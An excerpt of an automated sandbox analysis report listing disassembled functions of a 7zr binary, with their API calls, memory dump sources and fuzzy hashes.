                            • Opcode Fuzzy Hash: aa8ab301ab5d14ba1bc8a1a949ed206722f940741c447a403803b68e92fd92a6
                            • Instruction Fuzzy Hash: C301A27010424ABFDF268F54CC09BEE3FA9AB06324F148249B8A5522E2C6709F51E764
                            Function 00CDACF8 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CDC0B8
                              • Part of subcall function 00CC7193: __EH_prolog.LIBCMT ref: 00CC7198
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$free
                            • String ID:
                            • API String ID: 2654054672-0
                            • Opcode ID: 086ecddf068d823ec4fdfe93eaf16b7c77f82ecf6d3e174bc46ad0ead8f63382
                            • Instruction ID: 61d67242ea9b785cd6e6d0b2900004d2905c77d84385cd297796e767d84d0a02
                            • Opcode Fuzzy Hash: 086ecddf068d823ec4fdfe93eaf16b7c77f82ecf6d3e174bc46ad0ead8f63382
                            • Instruction Fuzzy Hash: 44F0E972900712DBD7259F4AD881BAEF3ADEF54760F14012FE91297711CBB1ED00C6A0
                            Function 00CE035F Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CE0364
                              • Part of subcall function 00CE01C4: __EH_prolog.LIBCMT ref: 00CE01C9
                              • Part of subcall function 00CE0143: __EH_prolog.LIBCMT ref: 00CE0148
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                              • Part of subcall function 00CE03D8: __EH_prolog.LIBCMT ref: 00CE03DD
                              • Part of subcall function 00CE004A: __EH_prolog.LIBCMT ref: 00CE004F
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$free
                            • String ID:
                            • API String ID: 2654054672-0
                            • Opcode ID: af1313ac944191f517830370dfc36d577f319edef0a589abf1bd984aa72a8bad
                            • Instruction ID: fcc41f5eff604f7bfd2e08a9c00dd179c050eaa63328b41b14c75cef30b899ff
                            • Opcode Fuzzy Hash: af1313ac944191f517830370dfc36d577f319edef0a589abf1bd984aa72a8bad
                            • Instruction Fuzzy Hash: 63F0F430914A90DBCB19EB69C42639DBBE4EF04314F20465DF852632D2CBF45B04A794
                            Function 00CD8565 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: c6d8809cbbc9a2d48fe6dfeda0267bf645bd46cf196c0d398bbe9f7fcf9d2c7a
                            • Instruction ID: 65198bd681aa065463f9c97bf02428c6a408afc1c87e35c6146f8a8beae3495c
                            • Opcode Fuzzy Hash: c6d8809cbbc9a2d48fe6dfeda0267bf645bd46cf196c0d398bbe9f7fcf9d2c7a
                            • Instruction Fuzzy Hash: 2CF0C272E0001AEBCB00EF98D8408EFBB74FF44750F00805AF515E7250DB348A05CBA0
                            Function 00CE5505 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CE550A
                              • Part of subcall function 00CE4E8A: __EH_prolog.LIBCMT ref: 00CE4E8F
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: b8b339d2c5c2ddd86156c83bb947cbe2c6f76129180e893a32ef91ee01e2de39
                            • Instruction ID: b16c62fbe09e153afeb65881c2ef3ebf02a0f453a7bd31a357e0c9d9ba10ab76
                            • Opcode Fuzzy Hash: b8b339d2c5c2ddd86156c83bb947cbe2c6f76129180e893a32ef91ee01e2de39
                            • Instruction Fuzzy Hash: 20F06D76A00958EBCB059F49D811A9EBBBAFF883A4F10442AF416A7201DB75DD009BB0
                            Function 00CC9987 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: e7e938c839f1b6849a0240072f7d4a6f00bca2d4a51f8e5cdcbe9711e05d7138
                            • Instruction ID: 8b59372a43f90cd1a85835e9bdfb959441677c9fd31f06a0771339ed3f599255
                            • Opcode Fuzzy Hash: e7e938c839f1b6849a0240072f7d4a6f00bca2d4a51f8e5cdcbe9711e05d7138
                            • Instruction Fuzzy Hash: FEE0E576A00208EFC714EF99D856F9EBBB8EF49364F10885EF40A97251CB75A940CA74
                            Function 00CE5E2B Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CE5E30
                              • Part of subcall function 00CE08B6: __aulldiv.LIBCMT ref: 00CE093F
                              • Part of subcall function 00CBDFC9: __EH_prolog.LIBCMT ref: 00CBDFCE
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$__aulldiv
                            • String ID:
                            • API String ID: 604474441-0
                            • Opcode ID: d0cc898fe9713c7a9826aed6297165bc33ad3517afce9148822331c641cacd85
                            • Instruction ID: edde32e3bd9e690ec5284ab7ac1b032c60784e0c34cbb20f3a7d35f538a48fa4
                            • Opcode Fuzzy Hash: d0cc898fe9713c7a9826aed6297165bc33ad3517afce9148822331c641cacd85
                            • Instruction Fuzzy Hash: 9FE039B0E007509FC755EFA9A14129EB7E4FB08740F00586EA042D3B81DAB4A900DB90
                            Function 00CE8ED1 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CE8ED6
                              • Part of subcall function 00CE9267: __EH_prolog.LIBCMT ref: 00CE926C
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 4c20c6e4422ba449c055ab537246409b98a3961612b0716e67b4787bca13c030
                            • Instruction ID: 4c6a35e551c785ee17ff3e23675d1afa493e31c2a2cf22bf03dcceb36a26964c
                            • Opcode Fuzzy Hash: 4c20c6e4422ba449c055ab537246409b98a3961612b0716e67b4787bca13c030
                            • Instruction Fuzzy Hash: 2AE092719105649ACB09EB64E522BDDB7A8EF04704F00065DA003A2682DBB46604D791
                            Function 00CA7C68 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                            Download Yara Rule
                            APIs
                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00CA7C8B
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: FileWrite
                            • String ID:
                            • API String ID: 3934441357-0
                            • Opcode ID: 2ddeb5dccaa7800b84f748ddfc7e3d6d2c0966b54afaecce6eaa818e2084a003
                            • Instruction ID: 77df7a0565ce09cb3d33b95ccc17090b07a9530ca132eeb2cdc62e8403fe597a
                            • Opcode Fuzzy Hash: 2ddeb5dccaa7800b84f748ddfc7e3d6d2c0966b54afaecce6eaa818e2084a003
                            • Instruction Fuzzy Hash: D6E06535600209FBCB00CFA1C800B8E7BB9AB0A358F20C02AF8189A260C3399A10DF10
                            Function 00CEBE69 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CEBE6E
                              • Part of subcall function 00CE5E2B: __EH_prolog.LIBCMT ref: 00CE5E30
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 9feee085b1538a6e5fecc38ae37ed4a84974481238efade0443a2424f0aedcc3
                            • Instruction ID: 2acf7fe00533be6519bcbbd98d94825ca2effdf91bf97b3f95c82e459bbe7405
                            • Opcode Fuzzy Hash: 9feee085b1538a6e5fecc38ae37ed4a84974481238efade0443a2424f0aedcc3
                            • Instruction Fuzzy Hash: A9E092B1A24AA08BD315EB64C015BDDB7A8FB00304F00855EE096D3282CFB46A08DBB1
                            Function 00CA2201 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: fputs
                            • String ID:
                            • API String ID: 1795875747-0
                            • Opcode ID: 23d7e87f01ab3abb76edd2865c937643ee4574f78f9518d8d67cf554565778a0
                            • Instruction ID: 34031da7b98bb351182b378508c4c2226aa5c187a3b2af36f6aaecbc79db0516
                            • Opcode Fuzzy Hash: 23d7e87f01ab3abb76edd2865c937643ee4574f78f9518d8d67cf554565778a0
                            • Instruction Fuzzy Hash: E9D01232504219ABCF156F94DC05CDD77BCEF09214B04441AF941E2190EA75E51497A4
                            Function 00CDF745 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CDF74A
                              • Part of subcall function 00CDF784: __EH_prolog.LIBCMT ref: 00CDF789
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: e3fdfeeaa5cad7111a37bb9cb7c364aee1becfdd30b8ce40f6a082ae1957aef4
                            • Instruction ID: 7964aa5db99033862472911e56a3252148e22263c7521e7af6ba311a50e0b450
                            • Opcode Fuzzy Hash: e3fdfeeaa5cad7111a37bb9cb7c364aee1becfdd30b8ce40f6a082ae1957aef4
                            • Instruction Fuzzy Hash: 2CD012B1E10248BFD7149F45D812BEEF778EB44754F10052EF00161241C3B55A0086B4
                            Function 00CA7B4F Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                            Download Yara Rule
                            APIs
                            • ReadFile.KERNELBASE(00000002,?,?,00000000,00000000,00000002,?,00CA785F,00000000,00004000,00000000,00000002,?,?,?), ref: 00CA7B65
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: a34abb122d80cd48dd1d5da4158b2d53ae45a75124bbe51a5fb17bd72032a73e
                            • Instruction ID: c4e301d78ffb0f878b2a2d38edbef610c0b94a2a027218a0f64df4e9b01b5898
                            • Opcode Fuzzy Hash: a34abb122d80cd48dd1d5da4158b2d53ae45a75124bbe51a5fb17bd72032a73e
                            • Instruction Fuzzy Hash: 97E0EC75201308FBDF01CF90CC01F8E7BB9AB49754F208058E90596260C375AA54EB50
                            Function 00CF80AA Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CF80AF
                              • Part of subcall function 00CA1E0C: malloc.MSVCRT ref: 00CA1E1F
                              • Part of subcall function 00CA1E0C: _CxxThrowException.MSVCRT(?,00D54B28), ref: 00CA1E39
                              • Part of subcall function 00CEBDB5: __EH_prolog.LIBCMT ref: 00CEBDBA
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ExceptionThrowmalloc
                            • String ID:
                            • API String ID: 3744649731-0
                            • Opcode ID: 88d90254b72606ea0a4eb0f8cdb52b3ce68be7f954ced6ac718c2ca0d13b49f8
                            • Instruction ID: c0e2e982e0efc4c8bcc8a5066cd94222acdf5d70dbd66385af7f581997aa7b33
                            • Opcode Fuzzy Hash: 88d90254b72606ea0a4eb0f8cdb52b3ce68be7f954ced6ac718c2ca0d13b49f8
                            • Instruction Fuzzy Hash: 15D05E71F01105AFCB48EFB4982676FB2A0EB44344F00457DA416E3781EF708A00CA25
                            Function 00CA6848 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                            Download Yara Rule
                            APIs
                            • FindClose.KERNELBASE(00000000,?,00CA6880), ref: 00CA6853
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: CloseFind
                            • String ID:
                            • API String ID: 1863332320-0
                            • Opcode ID: 4dc80b29dbf70c5b7ea35c8e25ba354e0c725048d81a9bf9f89afd134f07fc7f
                            • Instruction ID: ccd03b23776047363ec128423d7be97248896c5ae77cc7cc5df5c4851869de4d
                            • Opcode Fuzzy Hash: 4dc80b29dbf70c5b7ea35c8e25ba354e0c725048d81a9bf9f89afd134f07fc7f
                            • Instruction Fuzzy Hash: 8BD01235114322478A645E3D78449C533DC6E077383251759F0B0D31E6E7648C835750
                            Function 00CA2010 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: fputs
                            • String ID:
                            • API String ID: 1795875747-0
                            • Opcode ID: 2cf2b051911d22363055fa43eb48bbaec809a6503f75534b4b6f62b41a2047cc
                            • Instruction ID: c34f3d5b08ae1576ce1c35cffaf19b41ab8b5dbbaab0b61cfab1ca58613d3891
                            • Opcode Fuzzy Hash: 2cf2b051911d22363055fa43eb48bbaec809a6503f75534b4b6f62b41a2047cc
                            • Instruction Fuzzy Hash: FBD0C936008351AF96656F05EC09C8BBBA5FFD6320721082FF480921609B626825DAA0
                            Function 00CA1FA0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: fputc
                            • String ID:
                            • API String ID: 1992160199-0
                            • Opcode ID: 2c5cb220afe7826e89bf8ee1cfb0c5734ec4805efb9fd58f22a20fd474bc4bdc
                            • Instruction ID: 7f329eba018d9f67de71ab618965d539a1865163f42982d0f6ab283c948ae23e
                            • Opcode Fuzzy Hash: 2c5cb220afe7826e89bf8ee1cfb0c5734ec4805efb9fd58f22a20fd474bc4bdc
                            • Instruction Fuzzy Hash: C1B092323193209BE6581A9CBC0AAC06794DB0A732B21005BF544C22909A911C818AA5
                            Function 00CA7C3B Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                            Download Yara Rule
                            APIs
                            • SetFileTime.KERNELBASE(?,?,?,?,00CA7C65,00000000,00000000,?,00CAF238,?,?,?,?), ref: 00CA7C49
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: FileTime
                            • String ID:
                            • API String ID: 1425588814-0
                            • Opcode ID: 59ba3863dfe38a50d8c78753cb5d7b86bc7ec073edc31426858856b1652e4121
                            • Instruction ID: bcbae407105cc037d487a9dc9da6552a38fa0371eb14c774b3566f0e6a34b28c
                            • Opcode Fuzzy Hash: 59ba3863dfe38a50d8c78753cb5d7b86bc7ec073edc31426858856b1652e4121
                            • Instruction Fuzzy Hash: 42C04C3A159205FF8F020F70CC04C1ABBA2ABA5711F10D918F159C4471C7328024EB12
                            Function 00CA7D3C Relevance: 1.5, APIs: 1, Instructions: 6fileCOMMON
                            Download Yara Rule
                            APIs
                            • SetEndOfFile.KERNELBASE(?,00CA7D81,?,?,?), ref: 00CA7D3E
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: File
                            • String ID:
                            • API String ID: 749574446-0
                            • Opcode ID: 850be4dced5c94eef4514372eda9e26af6e9148d365151fd43f6af6a23c54bf3
                            • Instruction ID: bcd37c47304e9164b20bbeaaa2bdd188dcc612cead840dadaf13445f9dcdc7ae
                            • Opcode Fuzzy Hash: 850be4dced5c94eef4514372eda9e26af6e9148d365151fd43f6af6a23c54bf3
                            • Instruction Fuzzy Hash: D4A001742A621A8B8E511F74D8098243AA1AA6360676026A4A002CA5B5DA224419AA11
                            Function 00CAC4D6 Relevance: 1.5, APIs: 1, Instructions: 205COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: memmove
                            • String ID:
                            • API String ID: 2162964266-0
                            • Opcode ID: 1259c450fc1f00788d5ba3ea038f33c4146ab3c7ac0ed84976a74ed9ec6e78f5
                            • Instruction ID: 96bb2ec9710667fac794a49cd59756b1416ec3628a5f9bebf07101c3c4e3d98f
                            • Opcode Fuzzy Hash: 1259c450fc1f00788d5ba3ea038f33c4146ab3c7ac0ed84976a74ed9ec6e78f5
                            • Instruction Fuzzy Hash: F8813D75D0424A9FCF14CFA8C5C4AEEBBF1AF4A308F14846AE522B7241D775AA85CF50
                            Function 00CB3E04 Relevance: 1.3, APIs: 1, Instructions: 17COMMON
                            Download Yara Rule
                            APIs
                            • CloseHandle.KERNELBASE(00000000,00000000,00CB3D8D,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00CB3E12
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
